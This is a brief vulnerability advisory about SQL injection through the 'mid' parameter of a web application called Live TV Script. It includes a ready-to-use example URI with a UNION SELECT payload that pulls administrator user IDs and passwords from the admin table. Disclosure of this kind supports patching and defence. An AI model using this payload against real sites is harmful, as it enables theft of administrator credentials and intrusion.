Live TV Script 'mid' Parameter SQL Injection Vulnerability

Live TV Script 'mid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

www.example.com/path/index.php?mid=-99999+union+select+0,unhex(hex(concat(uid,0x3a,pwd))),0,0+from+admin/*